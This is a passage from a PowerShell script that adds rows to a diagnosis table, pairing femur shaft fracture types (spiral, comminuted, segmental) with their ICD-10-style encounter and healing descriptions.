right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of right femur","Nondisplaced spiral fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of left femur","Nondisplaced spiral fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced spiral fracture of shaft of unspecified femur","Nondisplaced spiral fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of right femur","Displaced comminuted fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of left femur","Displaced comminuted fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced comminuted fracture of shaft of unspecified femur","Displaced comminuted fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of right femur","Nondisplaced comminuted fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of left femur","Nondisplaced comminuted fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced comminuted fracture of shaft of unspecified femur","Nondisplaced comminuted fracture of shaft of unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of right femur","Displaced segmental fracture of shaft of right femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of left femur","Displaced segmental fracture of shaft of left femur, sequela") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced segmental fracture of shaft of unspecified femur","Displaced segmental fracture of shaft of unspecified femur, subsequent encounter for closed fracture with routine healing") + $null = 